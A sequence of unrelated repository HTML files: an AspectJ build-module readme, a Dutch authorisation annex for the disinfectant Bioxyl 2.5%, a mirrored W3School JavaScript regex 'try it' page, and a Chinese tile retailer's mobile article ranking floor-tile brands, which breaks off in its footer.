</div></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
test/html_to_md_bridge/test.html
hsestupin/lein-html2md
<html> <head> <title>AspectJ build module</title> </head> <body> <h1>AspectJ build</h1> This build module contains taskdefs and resources for doing builds and checking source licenses. This document describes our approach to builds and provides some notes for maintaining the build module and debugging builds. For information on running builds and doing testing for the AspectJ project, see <a href="readme-build-and-test-aspectj.html"> readme-build-and-test-aspectj.html</a>. <h3>Approach</h3> The AspectJ project source files are broken into modules, the subdirectories of the modules directory. (To eclipse users, each module is a Java or AspectJ project.) The modules are compiled independently and may be assembled by the build script into the release jar files. All required libraries are checked into the <code>lib</code> module. We use Ant to drive the build, but the logic for building and assembling modules resides in the BuildModule taskdef, which reads module dependencies from the Eclipse .classpath files and assembles the product according to the templates in the product directory. This makes it easy to change dependencies and add modules, but could make it difficult to debug if something were to go wrong. <h3>Maintaining the build module</h3> Because the BuildModule taskdef extracts dependencies from the Eclipse <code>.classpath</code> file, there is no need to update build scripts when adding or removing modules or changing their dependencies, so long as they are all in the base modules directory (usually the base of the eclipse workspace). Likewise, updating a product assembly should be easy, since they are based on introspection of the product directories. Still, the taskdef workings are not obvious in the build script, so this section makes clear some of the implicit logic in case it's required when debugging build failures or to make changes. <h4>Build module code updates</h4> The build module produces taskdefs used to run the build. The scripts avoid bootstrapping by using a build library jar checked in to <code>lib/build/build.jar</code>. That means code updates in the build module are not reflected in the build process until the <code>build.jar</code> produced by building this <code>build</code> module replaces that found in <code>lib/build/build.jar</code>. Once the module update is confirmed, the new <code>lib/build/build.jar</code> must be checked in to propogate the changes to other users. The scripts support an Ant variable <code>check.build.jar</code> by warning when <code>lib/build/build.jar</code> is out of date. <h4>BuildModule task</h4> The <a href="src/org/aspectj/internal/tools/ant/taskdefs/BuildModule.java"> BuildModule</a> taskdef implements an integrated module or product build. <p/><u>Module builds</u> are based on the Eclipse <code>.classpath</code> file, and can produce a jar with the module classes, with two variations: <ul> <li> include only the module classes, or assemble the jar complete with all antecedent modules and libraries; </li><li>compile the module(s) with or without any testing source or libraries </li> </ul> If there is a file {moduleName}.mf.txt in the module directory, it will be used as the manifest for the module jar file. <p/><u>Product builds</u> are defined by introspection of a <a href="products">products</a> subdirectory like <a href="products/tools">products/tools</a> for the AspectJ installer. These have an <code>install</code> directory for installer resources and a <code>dist</code> directory containing all files belonging in the distribution, including 0-length placeholders for the module build results (e.g., <a href="products/tools/dist/lib">products/tools/dist/lib</a>). These placeholder file names are mapped to the originating module by <code>Builder.moduleAliasFor(String)</code> using values in <a href="src/org/aspectj/internal/tools/build/Builder.properties"> Builder.properties</a>. (The "-all" suffix in the source jars means that the module and all required modules are included.) <p/> <a name="version"></a> <h4>Version synchronization</h4> The version is expressed in the jar manifests, in the <code>Version</code> class, and in some documentation files. The build script ensures all version expressions are aligned. When not doing or testing release builds, developers use the default "DEVELOPMENT" version. <p/>The build version is set in <a href="build-properties.xml">build-properties.xml</a> and propogated using Ant copy filters out to the <a href="../aspectj5rt/aspectj5rt.mf.txt">aspectjrt.jar manifest</a>, the <a href="../ajbrowser/ajbrowser.mf.txt">aspectjtools.jar manifest</a> and to <a href="../bridge/src/org/aspectj/bridge/Version.java"> ../bridge/src/org/aspectj/bridge/Version.java</a> which the <a href="build.xml">build.xml</a> <code>init-version</code> task generates from a template <a href="lib/BridgeVersion.java.txt">lib/BridgeVersion.java.txt</a>. To avoid updating <code>Version.java</code> whenever <code>build-properties.xml</code> changes, a task <a href="src/org/aspectj/internal/tools/ant/taskdefs/VersionUptodate.java"> src/org/aspectj/internal/tools/ant/taskdefs/VersionUptodate.java</a> determines whether Version.java has the same version by scanning the source file. The scan is dim-witted; do not change the lines flagged in the template without also changing the scanning code in the task. <h4>Temporary aj-{name} and persistant aspectj-{name}</h4> <p/> Top-level temporary build directories are prefixed "aj-", so you can safely destroy any such directory or ignore it in CVS or the Eclipse package explorer. By default the build script puts them at the same level as other modules. In build scripts, property names follow a similar convention; those prefixed "aj-" may be deleted at will, while "aspectj-" names are source directories which should never be deleted. <h4>Building Java 5 sources</h4> <p/> Java 5 source is supported in <code>{module}/java5-src</code> directories. Under Ant, when building in a pre-Java-5 VM, this source will be ignored (hence, it must not be required to compile). Under Eclipse, developers not using Java 5 should close the corresponding modules. <h4>Builder.properties, resources, and tree audit tests</h4> <p/> In <a href="src/org/aspectj/internal/tools/build/Builder.properties"> src/org/aspectj/internal/tools/build/Builder.properties</a> you can set up <ul> <li>product aliases for mapping module jars</li> <li>libraries to exclude for assembling module jars</li> <li>patterns for copying resources.</li> </ul> Regarding the patterns, if you add a resource with an unrecognized suffix to a source tree, the corresponding unit test in <a href="testsrc/BuildModuleTests.java">testsrc/BuildModuleTests.java</a> will fail. You'll need to update the <code>Builder.properties</code> file (and recreate the build.jar) to ensure that the new resource is copied to the assembled module jar. <h3>Debugging build problems</h3> <h4>Running under Eclipse</h4> When running Ant from eclipse, do not use the default Eclipse Ant classpath; remove those jars and add all the libraries in <a href="../lib/ant/lib">../lib/ant/lib</a> as well as in <a href="../lib/junit">../lib/junit</a>. If the build is failing under eclipse or Ant and the problem appears to be in the build module, you can run the build directly in eclipse (not using the Ant script) by running the skipped JUnit tests in <a href="testsrc/org/aspectj/internal/build/ModulesTests.java"> testsrc/org/aspectj/internal/build/ModulesTests.java</a>. <p/> <h4>Why new or changed modules might not work</h4> The BuildModule taskdef makes some assumptions about the naming, position, and contents of module directories and files. Understand those (documented in <a href="src/org/aspectj/internal/tools/ant/taskdefs/BuildModule.java"> BuildModule.java</a>) before using non-standard module directories. <h4>Silent classpath and build failures</h4> <u>warning</u>: When Ant runs compile processes, sometimes Jar files are not closed until the process quits. When running Ant under Eclipse, that means the jar files are not writable until eclipse quits. This affects build products (e.g., installers) which are run under eclipse (e.g., by opening with the "default system editor") and libraries used when compiling under Javac (if not zip products or input). This problem presents as files not being writable, i.e., deleted or modified. <p/> One workaround is to delete any existing build products before re-creating them. The problem with this is that Ant provides no notice of that deletes fail when deleting with quiet="on", but when not running in quiet mode, deletes will fail if the directory does not exist. The workaround-workaround would be to create any required directories before trying to deleting any files, with the result of creating unused empty directories. <p/> Currently BuildModule tasks forks the Javac command to try to work around this problem, but the Zip commands do not work around it. If under Eclipse, you get strange behavior with Ant builds, clear out everything and build from the command line. In some cases, you have to exit Eclipse before files can be deleted. (*sigh*) <p/> </body> </html>
doc/ctgb_html/12950.html
ivorbosloper/pestileaks
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>Bijlage I, bij het besluit d</TITLE> <META NAME="GENERATOR" CONTENT="LibreOffice 3.5 (Linux)"> <META NAME="AUTHOR" CONTENT="Gort"> <META NAME="CREATED" CONTENT="20130805;10220000"> <META NAME="CHANGEDBY" CONTENT="Gort"> <META NAME="CHANGED" CONTENT="20130805;10220000"> <META NAME="Info 1" CONTENT=""> <META NAME="Info 2" CONTENT=""> <META NAME="Info 3" CONTENT=""> <META NAME="Info 4" CONTENT=""> <STYLE TYPE="text/css"> <!-- @page { size: 8.27in 11.69in; margin: 0.98in } P { margin-bottom: 0.08in; direction: ltr; color: #000000; widows: 2; orphans: 2 } P.western { font-family: "Arial", sans-serif; font-size: 11pt; so-language: nl-NL } P.cjk { font-family: "Times New Roman", serif; font-size: 11pt } P.ctl { font-family: "Arial", sans-serif; font-size: 12pt; so-language: ar-SA } --> </STYLE> </HEAD> <BODY LANG="en-US" TEXT="#000000" DIR="LTR"> <P LANG="nl-NL" STYLE="margin-bottom: 0in"><B>Bijlage I, </B>bij het besluit d.d. 2 augustus 2013 tot toelating van het middel Bioxyl 2,5%, toelatingnummer 12950 N</P> <P LANG="nl-NL" STYLE="margin-left: 0.1in; text-indent: -0.1in; margin-bottom: 0in"> <BR> </P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> A.</P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> <U>WETTELIJK GEBRUI KSVOORSCHRI FT</U></P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> <BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> Toegestaan is uitsluitend het gebruik als middel ter bestrijding van<B> </B>bacteriën (excl. mycobacteriën en bacteriesporen) en gisten:</P> <OL> <LI><P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> op oppervlakken en apparatuur op plaatsen waar eet- en drinkwaren worden bereid, behandeld en bewaard, met uitzondering van melkwinningsapparatuur op de boerderij,</P> <LI><P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> op oppervlakken en apparatuur op plaatsen waar bloemen en planten worden verwerkt, behandeld en bewaard, </P> <LI><P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> op oppervlakken van meermalige emballage, waaronder bloemenemmers, veilingfusten en plantentrays. </P> </OL> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="" CLASS="western" STYLE="margin-bottom: 0in">De dosering en inwerktijd zoals aangegeven in de gebruiksaanwijzing moet worden aangehouden. </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Het middel alleen gebruiken op plaatsen waar de minimale inwerktijd van 30 minuten realiseerbaar is.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Het middel is uitsluitend bestemd voor professioneel gebruik.<SPAN LANG=""> </SPAN> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> <BR> </P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> B.</P> <P LANG="nl-NL" CLASS="western" ALIGN=CENTER STYLE="margin-bottom: 0in"> <U>GEBRUIKSAANWIJZING</U></P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> <U>Algemeen</U></P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> De te desinfecteren oppervlakken en materialen eerst grondig reinigen. Een daarbij gebruikt reinigingsmiddel afspoelen met schoon water. Overtollig water verwijderen. </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> Op het einde van de dag/productierun Bioxyl 2,5% opbrengen in de voorgeschreven concentratie en niet naspoelen. Het middel alleen gebruiken op plaatsen waar de minimale inwerktijd van 30 minuten realiseerbaar is.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> <BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> <U>Dosering</U>: </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in">Het middel is gebruiksgereed (ready-for-use) </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> Het te behandelen oppervlak bevochtigen zodat er een film van 0,1 mm dikte ontstaat (100 ml/m<SUP>2</SUP>) en het gehele oppervlak gelijkmatig bevochtigd is. </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> <BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> <U>Inwerktijd</U></P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in; line-height: 0.18in; widows: 0; orphans: 0"> De inwerktijd dient tenminste 30 minuten te zijn. Het oppervlak moet gedurende de inwerktijd nat blijven.</P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="margin-bottom: 0in"><BR> </P> </BODY> </HTML>
Coding/W3School/W3CN/www.w3school.com.cn/tiy/t7ede.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=jseg_regexp_caret by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 06:39:50 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <head> <meta charset="utf-8" /> <meta name="robots" content="all" /> <meta name="author" content="w3school.com.cn" /> <link rel="stylesheet" type="text/css" href="tc.css" /> <title>W3School在线测试工具 V2</title> </head> <body id="editor"> <div id="wrapper"> <div id="header"> <h1>W3School TIY</h1> <div id="ad"> <script type="text/javascript"><!-- google_ad_client = "pub-3381531532877742"; /* 728x90, tiy_big */ google_ad_slot = "7947784850"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="../../pagead2.googlesyndication.com/pagead/f.txt"> </script> </div> </div> <form action="http://www.w3school.com.cn/tiy/v.asp" method="post" id="tryitform" name="tryitform" onSubmit="validateForm();" target="i"> <div id="butt"> <input type="button" value="提交代码" onClick="submitTryit()"> </div> <div id="CodeArea"> <h2>编辑您的代码:</h2> <textarea id="TestCode" wrap="logical"> <html> <body> <script type="text/javascript"> var str="Is this his"; var patt1=/^Is/g; document.write(str.match(patt1)); </script> </body> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=jseg_regexp_caret by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 06:39:50 GMT --> </html> </textarea> </div> <input type="hidden" id="code" name="code" /> <input type="hidden" id="bt" name="bt" /> </form> <div id="result"> <h2>查看结果:</h2> <iframe frameborder="0" name="i" src="loadtext7ede.html?f=jseg_regexp_caret"></iframe> </div> <div id="footer"> <p>请在上面的文本框中编辑您的代码,然后单击提交按钮测试结果。<a href="../index-2.html" title="W3School 在线教程">w3school.com.cn</a></p> </div> </div> <script type="text/javascript"> function submitTryit() { var t=document.getElementById("TestCode").value; t=t.replace(/=/gi,"w3equalsign"); t=t.replace(/script/gi,"w3scrw3ipttag"); document.getElementById("code").value=t; document.getElementById("tryitform").action="v.html"; validateForm(); document.getElementById("tryitform").submit(); } function validateForm() { var code=document.getElementById("code").value; if (code.length>5000) { document.getElementById("code").value="<h1>Error</h1>"; } } </script> </body> </html>
wap/zxzx/2014-11-27/1401.html
306076197/hudson
<!DOCTYPE HTML> <html> <head> <meta name='renderer' content='webkit'> <meta charset='utf-8' /> <title> 家装地砖十大品牌知多少,品牌林立逐个数</title> <meta name="keywords" content="" /> <meta name="description" content="家装地砖十大品牌知多少,品牌林立逐个数" /> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" /> <meta content="yes" name="apple-mobile-web-app-capable" /> <meta content="black" name="apple-mobile-web-app-status-bar-style" /> <meta content="telephone=no" name="format-detection" /> <link href="favicon.ico" rel="apple-touch-icon-precomposed" /> <link href="favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/metinfo.css" id="metuimodule" data-module ="10001" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/green.css" /> <!--矢量图标css begin--> <link rel="stylesheet" href="http://www.hudson.com/wapfile/css/font-awesome.min.css"> <!--矢量图标css end--> <!--轮播皮肤css begin--> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/slider.css" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/slider.default.css" /> <!--轮播皮肤css end--> <!--面板皮肤css begin--> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/panel.css" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/panel.default.css" /> <!--面板皮肤css begin--> <!--内滚导航css begin--> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/navigator.css" /> <!--内滚导航css end--> <!--选项卡css begin--> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/transitions.css" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/tabs.css" /> <link rel="stylesheet" type="text/css" href="http://www.hudson.com/wapfile/css/tabs.default.css" /> <!--选项卡css end--> <!--核心组件js begin--> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/zepto.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/touch.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/matchMedia.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/event.ortchange.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/parseTpl.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/gmu.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/event.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/widget.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/iscroll.js"></script> <!--面板相关 end--> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/throttle.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/event.scrollStop.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/panel.js"></script> <!--面板相关js end--> <!--轮播组件 begin--> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/slider.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/arrow.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/dots.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/$touch.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/$autoplay.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/$lazyloadimg.js"></script> <!--轮播组件js end--> <!--内滚导航js begin--> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/highlight.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/navigator.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/scrolltonext.js"></script> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/$scrollable.js"></script> <!--内滚导航js end--> <!--选项卡js begin--> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/tabs/tabs.js"></script> <!--选项卡js end--> <!--图片加载js begin--> <script type="text/javascript" src="http://www.hudson.com/wapfile/js/imglazyload.js"></script> <!--图片加载js end--> <script type="text/javascript"> var ks = 4, columnshow=3, classnow='10001', lang='cn', fliptext1='查看更多', fliptext2='加载中...' ,Empty='不能为空' ,member_err1='两次密码输入不一致' ,member_err2='密码应大于等于6位!' ,member_err3='' ,member_err4='用户名不能小于3位' ,falsh_y='350' ,promaximgY='300' ,imgmaximgY='300' ; </script> <style type="text/css"> body{ font-size:14px!important;} .flexslider li img{ height:350px;} .showproduct_slides img{ height:300px!important;} .showimg_slides img{ height:300px!important;} .dl-jqrun dt img,.dl-jqrun dt{ max-width:px;} </style> </head> <body> <div class="metcont" style="background:#fff;"> <header data-value=1> <div class="top"> <div class="top-logo" style="color:white;font-size:18px;padding-top:10px;"> &nbsp;哈德逊瓷砖 </div> <ul class="top-right"> <li class="tlist seach"><span class="tspan icon-search"></span> </li> <li class="tlist column"><span class="tspan icon-reorder"></span> <!--导航方式3--> <nav class="type3 none topmorebox"><i></i> <ul class="list-none"> <li id="nav_10001" ><a href='http://www.hudsonhome.cn/wap/gywm/' title='关于我们' class='nav'><span>关于我们</span></a></li> <li id='nav_1' ><a href='http://www.hudsonhome.cn/wap/cpzx/' title='关于我们' class='hover-none nav'><span>产品中心</span></a></li> <li id='nav_2' class='navdown'> <a href="http://www.hudson.com/wap/ppgs/2014-09-23/746.html" title='产品展示' class='hover-none nav'> <span>品牌故事</span></a></li> <li id='nav_7' > <a href="http://www.hudson.com/wap/ztfc/2014-09-23/768.html" title='展厅风采' class='hover-none nav'> <span>展厅风采</span></a></li> <li id='nav_19' > <a href="http://www.hudson.com/wap/zxhd/2014-10-15/963.html" title='最新活动' class='hover-none nav'> <span>最新活动</span></a></li> <li id='nav_18' ><a href='http://www.hudsonhome.cn/wap/gcal/' title='工程案例' class='hover-none nav'><span>工程案例</span></a></li> <li id='nav_18' > <a href="http://www.hudson.com/wap/jmfw/2014-09-23/769.html" title='加盟服务' class='hover-none nav'> <span>加盟服务</span></a></li> <li id='nav_18' ><a href='http://www.hudsonhome.cn/wap/zxzx/' title='最新资讯' class='hover-none nav'><span>最新资讯</span></a></li> <li id='nav_18' > <a href="http://www.hudson.com/wap/lxwm/2014-09-23/645.html" title='联系我们' class='hover-none nav'> <span>联系我们</span></a></li> </ul> </nav> </li> </ul> </div> <!--搜索框--> <div class="seachbox none topmorebox"> <div class="seachbox_box"> <i></i> <form method="POST" name="myform" action="http://www.hudson.com//e/search/index.php"> <input type="text" name="keyboard" class="text" placeholder="请输入关键词" /> <input type="hidden" name="show" value="title" /> <input type="hidden" name="tempid" value="1" /> <input type="hidden" name="tbname" value="news" /> <input type="submit" name="Submit" value="立即搜索" class="submit" /> </form> </div> </div> </header> <script type="text/javascript"> //导航 $("#nav li.navdown").addClass('ui-state-active'); if($("nav").size()>0){ var navsize = $('.navflipsnap li').size(); var navszlt = new Array(); if(columnshow==1){//内滚导航 if(document.documentElement.clientWidth>800){ $(".metcont").width(340); } function navmore(navsize,ks){ ks=ks>4?4:ks; navszlt[1] = Math.round($('.metcont').width()/1); navszlt[2] = Math.round($('.metcont').width()/2); navszlt[3] = Math.round($('.metcont').width()/3); navszlt[4] = Math.round($('.metcont').width()/4); $('#nav li').width(navszlt[ks]); $('#nav').navigator(); } navmore(navsize,ks); $(window).resize(function() { navmore(navsize,ks); }); }else if(columnshow==2){//普通导航 function navtype2(ks){ navszlt[1] = '100%'; navszlt[2] = '50%'; navszlt[3] = '33.3%'; navszlt[4] = '25%'; $('nav.type2 li,nav.type3 li').css("width",navszlt[ks]); //if(ks==3)$('nav.type2 li,nav.type3 li').each(function(i){ i++; if(i%3==0){ $(this).css("width",'34%'); } }); } navtype2(ks); $(window).resize(function() { navtype2(ks); }); } } </script> <div class="sidebar"> <div class="sb_nav"> <h3 class='title'> <!-- <p class="moresidebar">更多分类</p> --> 家装地砖十大品牌知多少,品牌林立逐个数 </h3> </div> <div class="sb_box"> <div class="editor active" id="showtext"> <div> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">家装地砖十大品牌知多少?对于这个问题,很多消费者都未曾了解过。面对眼花缭乱的国内地砖排行榜,国内地砖知名品牌榜等等充满噱头的东西,想必大家都只是一掠而过吧。地砖作为家装必不可少的材料之一,优质的地砖能够防止渗水,容易打理,还能很好的装饰家装,起到画龙点睛的作用。市面上家装地砖的品牌众多,质量良莠不齐,要想打造好家装就要选择质量好的地砖十大品牌。下面小编带大家认识家装地砖十大品牌,一起来逐个数。(排名不分先后)</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">东鹏地砖。东鹏是中国建筑陶瓷行业的标志性品牌,规模庞大,品种规格齐全,有着良好的信誉和口碑,把现代高新技术和东方陶瓷文化结合起来,生产优质的地砖,提升消费者生活品味。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">哈德逊地砖。公司凭借雄厚的实力致力于打造整体家居网络直销平台,建立了最完善的瓷砖电子商务平台,成为国内家居网上直销领域的风向标,并被评为天猫建材十大品牌和最受消费者欢迎的网络瓷砖品牌。近两年来还荣获天猫瓷砖销量榜首的称号。</span></p> <p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" align="center" style="text-align:center"><span lang="EN-US"><img src="/d/file/xwzx/qyxw/2015-01-08/3d1f585f7b04996c79478cda4c6621a2.jpg" alt="" />&nbsp;</span></p> <p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">冠珠地砖。冠珠是新明珠陶瓷集团旗下第一大品牌,其生产的地砖主要有抛光砖、仿古砖和耐磨砖,规格和花色都很齐全,凭借专业的能力和过硬的质量在建陶行业打出属于自己的一片天地</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">鹰牌地砖。鹰牌是我国著名的瓷砖品牌,专业生产瓷质砖、釉面砖、防滑地砖等,多年来不断开拓创新,开发出优质的新产品,以上乘的质量和贴心的服务树立起良好的品牌形象。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">蒙娜丽莎地砖。蒙娜丽莎是专业生产高端瓷砖的陶瓷企业,集科研开发、专业生产、营销为一体,产品款式与花色众多,质量稳定可靠,价格合理,在建陶行业有着很高的地位。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">诺贝尔地砖。诺贝尔是中国建材行业知名企业,有着先进的生产技术,优秀的设计团队,生产人性化的优质产品,为客户长早完美的居住空间,服务贴心周到,赢得了广大客户的喜爱和信赖。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">新中源地砖。新中源规模庞大,综合实力强,以打造国际建陶品牌为目标,用先进的技术生产高品质的地砖,能满足消费者的不同需求,受到很多消费者的青睐,成为知名建陶品牌。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">欧神诺地砖。欧神诺以先进的设备和技术生产出各种高档地砖,有着其独特的管理和销售模式,创造出美丽时尚、奢华高贵的地砖,成为人们追求的目标。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">马可波罗地砖。马可波罗是国内最早品牌化的陶瓷品牌,有多个产品系列,品种齐全,特别是仿古砖做的非常好,知名度很高,是中国地砖行业的驰名品牌。</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal" style="text-indent:21.75pt"><span style="font-family:宋体; mso-ascii-font-family:&quot;Times New Roman&quot;;mso-hansi-font-family:&quot;Times New Roman&quot;">宏宇地砖。宏宇是中国知名的现代化大型陶瓷企业,主要经营玻化砖、釉面砖、抛光砖,实力雄厚,产品品种齐全,花色绝美,耐磨耐用,是中国地砖驰名商标。</span></p> <p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p> <p class="MsoNormal"><span style="font-family:宋体;mso-ascii-font-family:&quot;Times New Roman&quot;; mso-hansi-font-family:&quot;Times New Roman&quot;">文章来源:哈德逊瓷砖编辑原创</span></p> <p>&nbsp;</p> <p class="MsoNormal"><span style="font-family:宋体;mso-ascii-font-family:&quot;Times New Roman&quot;; mso-hansi-font-family:&quot;Times New Roman&quot;">转载请注明出处</span><span lang="EN-US">http://www.hudsonhome.cn</span></p> </div> <div class="clear"></div> </div> </div> <div class="clear"></div> </div> <style type="text/css"> .foot-text{background:#9a9b9f; color:#ffffff;} .foot-text a{ color:#ffffff;} </style> <div class="foot-text"> 服务热线:0757-82279667<div class='metpcmobile'>版有所权,侵权必究</div> </div> <div id="footnum" data-value="1"></div> <div id="footernav"> <div class="footerboxnav"> <div id="jisou-info" class="jisou-info" style="display:none;"></div> <div class="info-nr"> <div id="info-nr-phone" 